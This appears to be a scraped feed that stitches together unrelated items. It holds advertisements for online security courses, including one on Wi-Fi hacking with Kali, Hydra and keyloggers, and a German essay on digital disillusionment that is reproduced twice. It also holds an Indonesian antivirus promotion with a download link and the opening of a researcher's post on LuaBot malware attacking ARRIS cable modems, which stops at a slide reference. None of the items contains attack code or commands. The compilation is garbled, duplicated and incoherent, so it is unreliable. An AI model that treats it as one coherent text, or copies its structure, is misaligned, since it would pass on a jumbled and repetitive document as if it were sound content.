  • CompTIA Certified (Network +) ID #
  • CompTIA Certified (Server +)
  • CompTIA Certified (Linux +)
  • CompTIA Certified (Security +)
  • Cisco Certified Network Associate (CCNA)ID #CSCO11273248
  • Cisco Certified Network Professional (CCNP)
  • Project Management Professional (PMP) )ID #1772374

Information Security Management Fundamentals


KEY FEATURES

Dive into the fundamentals of information security and essential cyber security principles with this immersive course! The world is constantly interconnected by networks, and companies have a vested interest in keeping the information on those networks secure. Therefore, they're willing to pay big bucks to information security professionals, and this course will teach you how to break into those elite ranks.

  • Access 74 lectures & 7.5 hours of content 24/7
  • Understand the fundamentals of information security management
  • Learn about hardening systems, basic network zones, IT personnel policies, & more
  • Discover disaster recovery basics
  • Discuss fundamental security threats, network security devices, access control concepts, & more
  • Better protect your business & IT infrastructure

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: beginner

Compatibility

  • Internet required

THE EXPERT

Alton Hardin is an educator, poker coach, self-published & best-selling author, and full-time IT and Business professional. Alton is the founder of MicroGrinder Poker School and the best-selling author of Essential Poker Math for No Limit Holdem; moreover, he is the creator of numerous online poker courses. Alton has been playing poker for over a decade both live and online. He helped pay his way through college playing live low stakes games in the early 2000's. Today, Alton enjoys playing the micro stakes for enjoyment and a teaching instrument, where he has racked up over $1,000 in earnings playing mainly 5nl & 10nl.

Outside of poker, Alton is a full-time business and IT professional, where he works in the field of cyber security. He has earned two graduate degrees, an M.B.A. and M.S. in IT Network Management; moreover, he currently holds multiple IT industry certifications.

Alton also has a fond love for teaching. As an undergraduate he group tutored chemistry students and as a graduate student he taught a GMAT prep course. Upon graduating from his MBA program, he began teaching as an adjunct professional for the School of Business & Public Administration at his local state university in the field of Information Systems and IT Management.

Web Security: Common Vulnerabilities & Their Mitigation


KEY FEATURES

The best way to protect yourself on the web is to actually learn how common attacks work so you can coat your online persona in a suit of armor. In this course, you'll walk through a wide range of web app security attacks and learn the exact steps you can take to mitigate each. Plus, you'll get the lowdown on how to adopt simple practices to keep yourself protected. By course's end, you'll be a security whiz.

  • Access 56 lectures & 8 hours of content 24/7
  • Understand how common web security attacks work
  • Learn how to write code to mitigate security risks
  • Implement secure coding practices to reduce vulnerabilities
  • Discuss security attacks like cross site scripting, session hijacking, credential management, SQL injection, & more

PRODUCT SPECS

Details & Requirements

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: all levels, but a basic understand of JavaScript and PHP is encouraged

Compatibility

  • Internet required

THE EXPERT

Loonycorn is comprised of four individuals—Janani Ravi, Vitthal Srinivasan, Swetha Kolalapudi and Navdeep Singh—who have honed their tech expertises at Google and Flipkart. The team believes it has distilled the instruction of complicated tech concepts into funny, practical, engaging courses, and is excited to be sharing its content with eager students.

Wi-Fi Hacking with Kali


KEY FEATURES

Network security is an essential to any home or corporate internet connection, which is why ethical hackers are paid big bucks to identify gaps and threats that can take a network down. In this course, you'll learn how to protect WEP, WPA, and WPA2 networks by using Kali Linux, one of the most popular tools for ethical hackers. By course's end, you'll have the know-how to protect network environments like a pro.

  • Access 22 lectures & 1.5 hours of content 24/7
  • Set up a penetration testing environment
  • Learn 4 different ways to install & use Kali Linux
  • Understand how to hack WEP-protect WiFi & learn countermeasures
  • Discover how to hack WiFi using Hydra, a keylogger, or by removing devices

PRODUCT SPECS

Details & Requirements:

  • Length of time users can access this course: lifetime
  • Access options: web streaming, mobile streaming
  • Certification of completion not included
  • Redemption deadline: redeem your code within 30 days of purchase
  • Experience level required: beginner

Compatibility:

  • Internet required

THE EXPERT

Amit Huddar is an Internet Entrepreneur and Software Engineer. He runs his own software company "Softdust," which develops products for new technologies like wearables and other gadgets. He opted for computer science engineering in 2013 at SSIT and started his software company in his first year of engineering.

His skills include: Android app development, HTML, CSS, PHP, C, C++, JAVA, Linux, Building Custom Linux OS, Cloud Computing. Penetration testing, Kali Linux and Hacking.

          Digital sucks: Das Leben in der Beta-Welt   

Können wir reden? Digital sucks ... greatly! Da ist so ein quälendes Gefühl, dass eine Menge digitales Zeug irgendwie schief läuft. Oftmals werden digitale Produkte ihren Versprechen nicht gerecht.

Nehmen wir zum Beispiel Twitter. Für eine Weile sah es vielversprechend aus. Aber dann kam Trump. Wir haben unsere Uber-Fahrten genossen, nur um eine ausgewachsene Kernschmelze zu erleben. Oder denken wir an das Internet der Dinge. Wir hofften auf eine Zukunft voll von vernetzten Geräten, aber was wir stattdessen erleben, sind riesige Botnetze, die große Teile des Internets lahmlegen, und Glühbirnen, die anfällig für Virenangriffe sind.

Einst lauschten wir gläubig dem Versprechen künstlicher Intelligenz. Jetzt machen wir uns Sorgen, dass wir unsere Arbeit an Maschinen verlieren werden und dass AI schließlich die Weltherrschaft übernehmen und den Menschen als die höchste Lebensform auf der Erde ersetzen wird. Darüber hinaus haben wir stark an das Internet als eine leistungsfähige Plattform für eine blühende Kultur geglaubt. Stattdessen haben wir Angst bekommen, dass das Internet den kreativen Inhalt aus der ganzen Welt aufsaugen wird, bis nichts mehr übrig ist (David Byrne, 2013).

Digital sucks! Oder nicht? Eines ist sicher: Wir leben in einer Beta-Welt. Nichts Digitales scheint jemals fertig zu sein, und wir warten immer auf das nächste Update. Bei jedem Update werden alte Bugs behoben - und gleichzeitig neue eingeführt. Wir leben ständig an der vordersten Front und gehen mit unserem Einsatz von Technologie und Werkzeugen hohe Risiken ein.

Haben wir es mit einem weißen Elefanten zu tun? Wir können unsere digitalen Besitztümer nicht einfach so entsorgen, aber die Kosten sind allzu oft höher als ihr Nutzen.

Die gleiche Frage kann im Hinblick auf die digitale Transformation gestellt werden, vor allem in der Rückschau auf himmelhohe Investitionen, die die meisten Unternehmen im Laufe der letzten Jahre getätigt haben. Viel Zeit und Geld flossen in glänzende neue digitale Projekte, aber hat sich die Wahrscheinlichkeit des Überlebens für diese Unternehmen entsprechend erhöht? Oder sind sie immer noch mit den gleichen großen Risiken der Disruption konfrontiert? „Software is eating the world”, wie Marc Andreessen einst formuliert hat.

Wie konnte es geschehen, dass das Land der digitalen Utopie, mit Unicorns bevölkert, sich nun in einen dystopischen Albtraum verwandeln könnte? Jede Revolution hat ihre Kosten. Diese Kosten können zwar aus der Perspektive vieler Menschen zu hoch sein, aber haben diese Leute ein Mitspracherecht? Ironischerweise war es der unerbittliche Fokus auf den Nutzer der digitalen Technologie, den Verbraucher und den Mensch, der viele digitale Dinge so überwältigend erfolgreich gemacht hat. Der gleiche Nutzer, dem Technologie so viel Mehrwert gebracht hat, hat jetzt das Gefühl, dass der Preis, den er am Ende bezahlen muss, zu hoch sein könnte.

Wir verdienen eine bessere digitale Welt

Digital shouldn’t suck; weder für Kunden noch für Angestellte und andere Stakeholder.

Zunächst einmal müssen wir zugeben, dass die in den siebziger Jahren entstandene Tech-Utopie zumindest teilweise übermäßig optimistisch war und nicht so sehr in der Realität verankert war, wie in einer Art Wunschdenken. Technologie an sich ist nicht die Lösung für alle Arten von Problemen, sondern sie ist ein Werkzeug, das auf viele verschiedene Weisen verwendet werden kann. Die kalifornische Ideologie war schlicht – eine Ideologie. Als solche war sie sicherlich mächtig, aber früher oder später gerät jede Ideologie mit einer andersgearteten Realität in Konflikt.

Das ist genau das, was mit Uber und in geringerem Maße auch mit Lyft passiert. Beide Ridesharing-Dienste zeigten eine gewisse Art von Arroganz, als sie aus dem Markt in Austin zurückkamen, nachdem die Stadt beschlossen hatte, Hintergrundüberprüfungen für die Fahrer zu verlangen. Dies war ein klassisches Beispiel für den Zusammenstoß einer Ideologie des freien Marktes mit Regulierungsvorschriften.

Im Nachhinein war das aber nur eine düstere Vorahnung der PR-Katastrophe, vor der Uber Anfang 2017 stand, als CEO Travis Kalanick von einem Uber-Fahrer des schlechten Benehmens bezichtigt wurde, während gleichzeitig Vorwürfe von systematischem Sexismus und Belästigung auftauchten. Uber musste auf die harte Tour lernen, dass eine toxische Firmenkultur und eine eklatante Vernachlässigung der Verantwortung des Unternehmens auf die Firma zurückfallen kann und mit Sicherheit auch wird, was schließlich die Performance beeinträchtigt. Digital shouldn’t suck; weder für Kunden noch für Angestellte und andere Stakeholder.

Digitale Wertschöpfung basiert auf den Service-Erfahrungen des Nutzers

Zweitens: Da die Wertschöpfung von anderen Sektoren der Wirtschaft in den digitalen Bereich abwandert, geht dieser Prozess unweigerlich mit der Abwertung von traditionellen Vermögenswerten, Fertigkeiten und Arbeitsplätzen einher. Diese Verschiebung ist nichts Besonderes, es ist schon einmal passiert – zuerst mit der industriellen Revolution und später mit dem Aufstieg des Dienstleistungssektors. Lösungen sind notwendig, um den Übergang zu erleichtern, nicht um ihm zu widerstehen, denn Widerstand ist zwecklos. Die Menschen werden immer in Regionen, Industrien und Berufe strömen, wo die Wertschöpfung höher ist als anderswo. In diesen Tagen ist es die digitale Sphäre, wo das der Fall ist. Drittens müssen wir bedenken, dass Twitter, wie das Internet, nicht aus sich selbst zur Freiheit des Denkens und der Meinungsäußerung führt. Während es die Nutzer befähigen kann, ihre Stimmen zu erheben, kann es auch die Stimmen derjenigen verstärken, die bereits einen riesigen Mindshare besitzen. Donald Trump hat bewiesen, dass Twitter riesige Massen von Anhänger höchst effektiv ansprechen kann, unter Umgehung traditioneller Medien. Das gleiche gilt für andere Plattformen wie Facebook. Während das digitale Feld in der Tat anders ist, ist es der etablierten Mediensphäre nicht völlig unähnlich. Die Aufmerksamkeitsökonomie bevorzugt diejenigen, die verstehen, wie man die meiste Aufmerksamkeit auf sich zieht. So ist es an uns zu entscheiden, ob wir auch weiterhin bevorzugt demjenigen zuhören wollen, der am lautesten bellt – oder ob wir neue Algorithmen finden wollen, die den Menschen bessere Wahlmöglichkeiten geben.

Das gleiche gilt für die Popkultur. Wir haben den Aufstieg von Influencern und Youtube-Stars erlebt, während die Geschäftsmodelle der Etablierten anfingen zu bröckeln und in einigen Fällen zusammengebrochen sind. Es könnte so aussehen, als ob das Internet alle kreativen Inhalte aus der ganzen Welt aufsaugen würde, wie David Byrne es formuliert hat. Aber eine realistischere Sichtweise würde erkennen, dass die digitale Wertschöpfung sich ganz einfach von den Geschäftsmodellen der Vergangenheit unterscheidet. Diese waren auf Knappheit von physischen Gütern basiert, die verpackt, bepreist und an einen Massenmarkt verkauft werden konnten. Im Vergleich dazu basiert die digitale Wertschöpfung auf der Serviceerfahrung des Nutzers. Zwar hat sie noch eine physische Hardwarekomponente, doch ist die Software viel wichtiger.

Streaming-Dienste wie Netflix und Spotify vertreiben keine DVDs oder CDs, sondern verkaufen monatliche Abonnements für den Zugriff auf riesige Bibliotheken von digitalen Inhalten. Sie lernen die Nutzerpräferenzen und passen ihre Dienste dem persönlichen Geschmack an. Dienstleistungen wie diese können für den Benutzer wertvoller sein als herkömmliche Medienpakete. Gleichzeitig fesseln sie den Benutzer an zeitraubende Gewohnheiten wie Binge-Watching. Sowohl Netflix als auch Spotify bewegen sich mittlerweile zunehmend in die Content-Erstellung und schalten dabei traditionelle Zwischenhändler wie Filmstudios und Musiklabels aus. Dieser strukturelle Wandel muss für Künstler nicht schlecht sein, zumindest wenn sie lernen, wie man nach den neuen Regeln spielt.

Der vierte Produktzyklus wird von AI befeuert

Es scheint, dass die Propheten der New Economy in den neunziger Jahren größtenteils richtig lagen, als sie die New Rules anpriesen. Falsch war indes die weit verbreitete Erwartung der Veränderungsgeschwindigkeit. Es wurde überschätzt, wie schnell die Nutzer neue Verhaltensweisen annehmen, aber unterschätzt, wie weit die Veränderungen reichen würden. Das gleiche gilt für den nächsten Tech-Zyklus, der durch künstliche Intelligenz (maschinelles Lernen, Deep Learning) und sprachgesteuerte Schnittstellen wie Alexa und Siri angeheizt wird.

AI, maschinelles Lernen und Deep Learning haben nun ein Stadium erreicht, in dem sich Maschinen im Wesentlichen selbst programmieren. Das macht es für Menschen sehr schwer zu verstehen, was diese Maschinen tatsächlich tun. Erwarten Sie in naher Zukunft eine Menge heftiger Debatten über diese Fragen. Das seltsam fehlgeleitete Argument über die Ethik der selbstfahrenden Autos, die entscheiden, ob sie ihren Passagier oder einen unschuldigen Fußgänger töten sollen, ist nur eine düstere Vorahnung.

Voice-Schnittstellen beruhen stark auf AI-Algorithmen und massiven Datenmengen als Backend und Backbone. Bessere Algorithmen und Daten sorgen für eine bessere Interface-Qualität, was wiederum mehr und verbesserte Daten generiert, die verwendet werden können, um erweiterte Algorithmen zu entwickeln und noch mehr Daten zu generieren. Ein sich selbst verstärkender Effekt. Das Rennen um die nächste dominante Plattform hat begonnen, und Gewinner werden diejenigen sein, die den Virtuous Circle der Daten und die Interface-Qualität am besten hinbekommen.

Wir werden immer mehr Algorithmen und Anwendungen wie die Avatare von Soul Machine sehen, die in der Lage sind, mit Menschen auf einer emotionalen Ebene zu interagieren – die unsere Gefühle vielleicht sogar noch besser als Menschen lesen und auf sie in einer bis vor kurzem unvorstellbaren Weise reagieren. Wie fühlen wir uns angesichts dessen? Nach den früheren Zyklen (PC, Web und Mobile) kann der nächste Übergang noch schneller sein. Während der PC etwa 20 Jahre brauchte, um den Massenmarkt zu erreichen, brauchte das Web nur 15 Jahre, und es sieht so aus, als ob der aktuelle Mobile-Zyklus nach zehn Jahren abgeschlossen wäre. Um 2025 werden wir sehen, ob der vierte Zyklus in nur fünf Jahren komplettiert sein wird und vielleicht noch mehr Menschen erreicht als das Smartphone.

Werden wir bald die Killer-Applikation von IOT sehen?

Während maschinelles Lernen und Voice-Interfaces bereits vielversprechende Anwendungsfälle zeigen, scheint das Internet der Dinge noch keine zu haben. IoT sieht sehr wie Mobile aus, bevor es das iPhone gab. Heute fügen IoT-Geräte oft nur zusätzliche Komplexität zu ansonsten einfachen Anwendungsfällen wie Raumbeleuchtung oder Heizung hinzu. Das intelligente Haus, das uns schon seit einiger Zeit versprochen wurde, sieht noch nicht so besonders schlau aus.

Es besteht ein gewaltiger Bedarf, das Nutzererlebnis von Gebäuden, Büros und Wohnungen neu zu gestalten. Dieses Erlebnis ist seit Jahrzehnten grundsätzlich unverändert, und aktuelle IoT-Geräte digitalisieren nur bekannte Interfaces, ohne sie zu überdenken und von Grund auf zu verändern. Diese Arbeit muss getan werden, und sie wird getan werden, mit riesigen Belohnungen für diejenigen, die es schaffen, die dominierenden digitalen Plattformen für Immobilien zu werden.

Auf lange Sicht können und werden vermutlich große Teile des gigantischen Immobilienmarktes in ein digitales Dienstleistungsgeschäft verwandelt, das auf Plattformen wie Airbnb lebt. Die Nutzer werden komplett ausgestattete Häuser, Wohnungen und auch Büroflächen für eine begrenzte Zeit oder sogar langfristig mieten. Jeder Aspekt des Gebäudes wird ordnungsgemäß in eine einzige monatliche Rechnung passen, alle Dienstleistungen digital und automatisch gemessen und abgerechnet. Dies ist die Killer-Applikation von IoT, aber es könnte einige Zeit dauern, sie vollständig zu entwickeln.

Wie sie Produkte entwickeln, die den Menschen dienen

Digitale Produktentwicklung ist hart, kann scheitern, und es gibt keine Abkürzungen. Wie jede Neuerung ist sie riskant. Letzten Endes ist Produktinnovation die Entdeckung eines neuen Kundennutzens. Transformationale Produkte haben ein radikales Nutzenversprechen – und sie liefern sofort, anstatt Dinge zu versprechen, die sie nicht liefern können. Ein positives Erlebnis für den Anwender ist der erste Schritt zu einer nachhaltigen Verhaltensänderung. Um die Erwartungen der Nutzer, das Nutzerverhalten und nicht zuletzt die Wertschöpfung zu verändern, ist die Schaffung von Mehrwert das Geheimrezept der erfolgreichen digitalen Transformation.


          Kompas Antivirus, Antivirus Terampuh Dari Indonesia   

Kompas Antivirus merupakan program antivirus dengan jumlah database terbesar di Indonesia yang bertujuan untuk melindungi komputer dari ancaman malware. Pendeteksian difokuskan terhadap malware-malware baru seperti botnet, spyware, keylogger, password stealer, trojan downloader, binder, crypter dan lainnya. Kompas Antivirus handal dalam mendeteksi malware yang menyebar melalui flashdisk sehingga tidak ada celah untuk malware menginfeksi komputer Anda. Database malware akan selalu di-update secara rutin agar dapat mendeteksi malware/virus baru Percayakan perlindungan komputer Anda dengan mengggunakan Kompas Antivirus.​

[​IMG]

Fitur-Fitur Kompas Antivirus :
  • Antivirus tercepat dan teringan dalam penggunaan memory.
  • Dapat diintegrasikan dengan database ClamAV menggunakan plugin kclam.dll hingga mampu mendeteksi lebih dari 3 juta virus.
  • Cegat Proses Virus Secara Real-time (Pro Version).
  • Tampilan yang memudahkan pengguna dalam menggunakan semua fitur.
  • Fokus terhadap perlindungan pada ancaman pencurian data.
  • Modul heuristic canggih untuk mendeteksi virus yang menginfeksi file exe seperti Sality dan Virut.
  • Modul heuristic canggih untuk mendeteksi malware yang terenkripsi.
  • Modul heuristic canggih untuk mendeteksi malware pada flashdisk.
  • Modul heuristic canggih untuk mendeteksi worm VBS dan shortcut.
  • Scan file secara otomatis pada flashdisk yang dicolokan.
  • Scan file secara otomatis pada sistem.
  • Scan file di dalam archive (Rar/Zip).
  • Update online secara otomatis untuk database virus dan modul program.
  • Update Database pengenal virus setiap hari.
  • Tools tambahan untuk mempermudah membersihkan virus. dan lainnya.
Download Link
Click Here


           Digital sucks: Das Leben in der Beta-Welt    

Können wir reden? Digital sucks ... greatly! Da ist so ein quälendes Gefühl, dass eine Menge digitales Zeug irgendwie schief läuft. Oftmals werden digitale Produkte ihren Versprechen nicht gerecht.

Nehmen wir zum Beispiel Twitter. Für eine Weile sah es vielversprechend aus. Aber dann kam Trump. Wir haben unsere Uber-Fahrten genossen, nur um eine ausgewachsene Kernschmelze zu erleben. Oder denken wir an das Internet der Dinge. Wir hofften auf eine Zukunft voll von vernetzten Geräten, aber was wir stattdessen erleben, sind riesige Botnetze, die große Teile des Internets lahmlegen, und Glühbirnen, die anfällig für Virenangriffe sind.

Einst lauschten wir gläubig dem Versprechen künstlicher Intelligenz. Jetzt machen wir uns Sorgen, dass wir unsere Arbeit an Maschinen verlieren werden und dass AI schließlich die Weltherrschaft übernehmen und den Menschen als die höchste Lebensform auf der Erde ersetzen wird. Darüber hinaus haben wir stark an das Internet als eine leistungsfähige Plattform für eine blühende Kultur geglaubt. Stattdessen haben wir Angst bekommen, dass das Internet den kreativen Inhalt aus der ganzen Welt aufsaugen wird, bis nichts mehr übrig ist (David Byrne, 2013).

Digital sucks! Oder nicht? Eines ist sicher: Wir leben in einer Beta-Welt. Nichts Digitales scheint jemals fertig zu sein, und wir warten immer auf das nächste Update. Bei jedem Update werden alte Bugs behoben - und gleichzeitig neue eingeführt. Wir leben ständig an der vordersten Front und gehen mit unserem Einsatz von Technologie und Werkzeugen hohe Risiken ein.

Haben wir es mit einem weißen Elefanten zu tun? Wir können unsere digitalen Besitztümer nicht einfach so entsorgen, aber die Kosten sind allzu oft höher als ihr Nutzen.

Die gleiche Frage kann im Hinblick auf die digitale Transformation gestellt werden, vor allem in der Rückschau auf himmelhohe Investitionen, die die meisten Unternehmen im Laufe der letzten Jahre getätigt haben. Viel Zeit und Geld flossen in glänzende neue digitale Projekte, aber hat sich die Wahrscheinlichkeit des Überlebens für diese Unternehmen entsprechend erhöht? Oder sind sie immer noch mit den gleichen großen Risiken der Disruption konfrontiert? „Software is eating the world”, wie Marc Andreessen einst formuliert hat.

Wie konnte es geschehen, dass das Land der digitalen Utopie, mit Unicorns bevölkert, sich nun in einen dystopischen Albtraum verwandeln könnte? Jede Revolution hat ihre Kosten. Diese Kosten können zwar aus der Perspektive vieler Menschen zu hoch sein, aber haben diese Leute ein Mitspracherecht? Ironischerweise war es der unerbittliche Fokus auf den Nutzer der digitalen Technologie, den Verbraucher und den Mensch, der viele digitale Dinge so überwältigend erfolgreich gemacht hat. Der gleiche Nutzer, dem Technologie so viel Mehrwert gebracht hat, hat jetzt das Gefühl, dass der Preis, den er am Ende bezahlen muss, zu hoch sein könnte.

Wir verdienen eine bessere digitale Welt

Digital shouldn’t suck; weder für Kunden noch für Angestellte und andere Stakeholder.

Zunächst einmal müssen wir zugeben, dass die in den siebziger Jahren entstandene Tech-Utopie zumindest teilweise übermäßig optimistisch war und nicht so sehr in der Realität verankert war, wie in einer Art Wunschdenken. Technologie an sich ist nicht die Lösung für alle Arten von Problemen, sondern sie ist ein Werkzeug, das auf viele verschiedene Weisen verwendet werden kann. Die kalifornische Ideologie war schlicht – eine Ideologie. Als solche war sie sicherlich mächtig, aber früher oder später gerät jede Ideologie mit einer andersgearteten Realität in Konflikt.

Das ist genau das, was mit Uber und in geringerem Maße auch mit Lyft passiert. Beide Ridesharing-Dienste zeigten eine gewisse Art von Arroganz, als sie aus dem Markt in Austin zurückkamen, nachdem die Stadt beschlossen hatte, Hintergrundüberprüfungen für die Fahrer zu verlangen. Dies war ein klassisches Beispiel für den Zusammenstoß einer Ideologie des freien Marktes mit Regulierungsvorschriften.

Im Nachhinein war das aber nur eine düstere Vorahnung der PR-Katastrophe, vor der Uber Anfang 2017 stand, als CEO Travis Kalanick von einem Uber-Fahrer des schlechten Benehmens bezichtigt wurde, während gleichzeitig Vorwürfe von systematischem Sexismus und Belästigung auftauchten. Uber musste auf die harte Tour lernen, dass eine toxische Firmenkultur und eine eklatante Vernachlässigung der Verantwortung des Unternehmens auf die Firma zurückfallen kann und mit Sicherheit auch wird, was schließlich die Performance beeinträchtigt. Digital shouldn’t suck; weder für Kunden noch für Angestellte und andere Stakeholder.

Digitale Wertschöpfung basiert auf den Service-Erfahrungen des Nutzers

Zweitens: Da die Wertschöpfung von anderen Sektoren der Wirtschaft in den digitalen Bereich abwandert, geht dieser Prozess unweigerlich mit der Abwertung von traditionellen Vermögenswerten, Fertigkeiten und Arbeitsplätzen einher. Diese Verschiebung ist nichts Besonderes, es ist schon einmal passiert – zuerst mit der industriellen Revolution und später mit dem Aufstieg des Dienstleistungssektors. Lösungen sind notwendig, um den Übergang zu erleichtern, nicht um ihm zu widerstehen, denn Widerstand ist zwecklos. Die Menschen werden immer in Regionen, Industrien und Berufe strömen, wo die Wertschöpfung höher ist als anderswo. In diesen Tagen ist es die digitale Sphäre, wo das der Fall ist. Drittens müssen wir bedenken, dass Twitter, wie das Internet, nicht aus sich selbst zur Freiheit des Denkens und der Meinungsäußerung führt. Während es die Nutzer befähigen kann, ihre Stimmen zu erheben, kann es auch die Stimmen derjenigen verstärken, die bereits einen riesigen Mindshare besitzen. Donald Trump hat bewiesen, dass Twitter riesige Massen von Anhänger höchst effektiv ansprechen kann, unter Umgehung traditioneller Medien. Das gleiche gilt für andere Plattformen wie Facebook. Während das digitale Feld in der Tat anders ist, ist es der etablierten Mediensphäre nicht völlig unähnlich. Die Aufmerksamkeitsökonomie bevorzugt diejenigen, die verstehen, wie man die meiste Aufmerksamkeit auf sich zieht. So ist es an uns zu entscheiden, ob wir auch weiterhin bevorzugt demjenigen zuhören wollen, der am lautesten bellt – oder ob wir neue Algorithmen finden wollen, die den Menschen bessere Wahlmöglichkeiten geben.

Das gleiche gilt für die Popkultur. Wir haben den Aufstieg von Influencern und Youtube-Stars erlebt, während die Geschäftsmodelle der Etablierten anfingen zu bröckeln und in einigen Fällen zusammengebrochen sind. Es könnte so aussehen, als ob das Internet alle kreativen Inhalte aus der ganzen Welt aufsaugen würde, wie David Byrne es formuliert hat. Aber eine realistischere Sichtweise würde erkennen, dass die digitale Wertschöpfung sich ganz einfach von den Geschäftsmodellen der Vergangenheit unterscheidet. Diese waren auf Knappheit von physischen Gütern basiert, die verpackt, bepreist und an einen Massenmarkt verkauft werden konnten. Im Vergleich dazu basiert die digitale Wertschöpfung auf der Serviceerfahrung des Nutzers. Zwar hat sie noch eine physische Hardwarekomponente, doch ist die Software viel wichtiger.

Streaming-Dienste wie Netflix und Spotify vertreiben keine DVDs oder CDs, sondern verkaufen monatliche Abonnements für den Zugriff auf riesige Bibliotheken von digitalen Inhalten. Sie lernen die Nutzerpräferenzen und passen ihre Dienste dem persönlichen Geschmack an. Dienstleistungen wie diese können für den Benutzer wertvoller sein als herkömmliche Medienpakete. Gleichzeitig fesseln sie den Benutzer an zeitraubende Gewohnheiten wie Binge-Watching. Sowohl Netflix als auch Spotify bewegen sich mittlerweile zunehmend in die Content-Erstellung und schalten dabei traditionelle Zwischenhändler wie Filmstudios und Musiklabels aus. Dieser strukturelle Wandel muss für Künstler nicht schlecht sein, zumindest wenn sie lernen, wie man nach den neuen Regeln spielt.

Der vierte Produktzyklus wird von AI befeuert

Es scheint, dass die Propheten der New Economy in den neunziger Jahren größtenteils richtig lagen, als sie die New Rules anpriesen. Falsch war indes die weit verbreitete Erwartung der Veränderungsgeschwindigkeit. Es wurde überschätzt, wie schnell die Nutzer neue Verhaltensweisen annehmen, aber unterschätzt, wie weit die Veränderungen reichen würden. Das gleiche gilt für den nächsten Tech-Zyklus, der durch künstliche Intelligenz (maschinelles Lernen, Deep Learning) und sprachgesteuerte Schnittstellen wie Alexa und Siri angeheizt wird.

AI, maschinelles Lernen und Deep Learning haben nun ein Stadium erreicht, in dem sich Maschinen im Wesentlichen selbst programmieren. Das macht es für Menschen sehr schwer zu verstehen, was diese Maschinen tatsächlich tun. Erwarten Sie in naher Zukunft eine Menge heftiger Debatten über diese Fragen. Das seltsam fehlgeleitete Argument über die Ethik der selbstfahrenden Autos, die entscheiden, ob sie ihren Passagier oder einen unschuldigen Fußgänger töten sollen, ist nur eine düstere Vorahnung.

Voice-Schnittstellen beruhen stark auf AI-Algorithmen und massiven Datenmengen als Backend und Backbone. Bessere Algorithmen und Daten sorgen für eine bessere Interface-Qualität, was wiederum mehr und verbesserte Daten generiert, die verwendet werden können, um erweiterte Algorithmen zu entwickeln und noch mehr Daten zu generieren. Ein sich selbst verstärkender Effekt. Das Rennen um die nächste dominante Plattform hat begonnen, und Gewinner werden diejenigen sein, die den Virtuous Circle der Daten und die Interface-Qualität am besten hinbekommen.

Wir werden immer mehr Algorithmen und Anwendungen wie die Avatare von Soul Machine sehen, die in der Lage sind, mit Menschen auf einer emotionalen Ebene zu interagieren – die unsere Gefühle vielleicht sogar noch besser als Menschen lesen und auf sie in einer bis vor kurzem unvorstellbaren Weise reagieren. Wie fühlen wir uns angesichts dessen? Nach den früheren Zyklen (PC, Web und Mobile) kann der nächste Übergang noch schneller sein. Während der PC etwa 20 Jahre brauchte, um den Massenmarkt zu erreichen, brauchte das Web nur 15 Jahre, und es sieht so aus, als ob der aktuelle Mobile-Zyklus nach zehn Jahren abgeschlossen wäre. Um 2025 werden wir sehen, ob der vierte Zyklus in nur fünf Jahren komplettiert sein wird und vielleicht noch mehr Menschen erreicht als das Smartphone.

Werden wir bald die Killer-Applikation von IOT sehen?

Während maschinelles Lernen und Voice-Interfaces bereits vielversprechende Anwendungsfälle zeigen, scheint das Internet der Dinge noch keine zu haben. IoT sieht sehr wie Mobile aus, bevor es das iPhone gab. Heute fügen IoT-Geräte oft nur zusätzliche Komplexität zu ansonsten einfachen Anwendungsfällen wie Raumbeleuchtung oder Heizung hinzu. Das intelligente Haus, das uns schon seit einiger Zeit versprochen wurde, sieht noch nicht so besonders schlau aus.

Es besteht ein gewaltiger Bedarf, das Nutzererlebnis von Gebäuden, Büros und Wohnungen neu zu gestalten. Dieses Erlebnis ist seit Jahrzehnten grundsätzlich unverändert, und aktuelle IoT-Geräte digitalisieren nur bekannte Interfaces, ohne sie zu überdenken und von Grund auf zu verändern. Diese Arbeit muss getan werden, und sie wird getan werden, mit riesigen Belohnungen für diejenigen, die es schaffen, die dominierenden digitalen Plattformen für Immobilien zu werden.

Auf lange Sicht können und werden vermutlich große Teile des gigantischen Immobilienmarktes in ein digitales Dienstleistungsgeschäft verwandelt, das auf Plattformen wie Airbnb lebt. Die Nutzer werden komplett ausgestattete Häuser, Wohnungen und auch Büroflächen für eine begrenzte Zeit oder sogar langfristig mieten. Jeder Aspekt des Gebäudes wird ordnungsgemäß in eine einzige monatliche Rechnung passen, alle Dienstleistungen digital und automatisch gemessen und abgerechnet. Dies ist die Killer-Applikation von IoT, aber es könnte einige Zeit dauern, sie vollständig zu entwickeln.

Wie sie Produkte entwickeln, die den Menschen dienen

Digitale Produktentwicklung ist hart, kann scheitern, und es gibt keine Abkürzungen. Wie jede Neuerung ist sie riskant. Letzten Endes ist Produktinnovation die Entdeckung eines neuen Kundennutzens. Transformationale Produkte haben ein radikales Nutzenversprechen – und sie liefern sofort, anstatt Dinge zu versprechen, die sie nicht liefern können. Ein positives Erlebnis für den Anwender ist der erste Schritt zu einer nachhaltigen Verhaltensänderung. Um die Erwartungen der Nutzer, das Nutzerverhalten und nicht zuletzt die Wertschöpfung zu verändern, ist die Schaffung von Mehrwert das Geheimrezept der erfolgreichen digitalen Transformation.


          LuaBot: Malware targeting cable modems   
During mid-2015 I disclosed some vulnerabilities affecting multiple ARRIS cable modems. I wrote a blogpost about ARRIS' nested backdoor and detailed some of my cable modem research during the 2015 edition from NullByte Security Conference.

CERT/CC released the Vulnerability Note VU#419568 and it got lots of media coverage. I did not provide any POC's during that time because I was pretty sure that those vulnerabilities were easily wormable... And guess what? Someone is actively exploiting those devices since May/2016.

The malware targets Puma 5 (ARM/Big Endian) cable modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many common worm that targets embedded devices from multiple architectures. The final stage is an ARMEB version from the LuaBot Malware.


The ARMEL version from the LuaBot Malware was dissected on a blogpost from Malware Must Die, but this specific ARMEB was still unknown/undetected for the time being. The malware was initially sent to VirusTotal on 2016-05-26 and it still has a 0/0 detection rate.



Cable Modem Security and ARRIS Backdoors

Before we go any further, if you want to learn about cable modem security, grab the slides from my talk "Hacking Cable Modems: The Later Years". The talk covers many aspects of the technology used to manage cable modems, how the data is protected, how the ISPs upgrade the firmwares and so on.


Pay special attention to the slide #86:


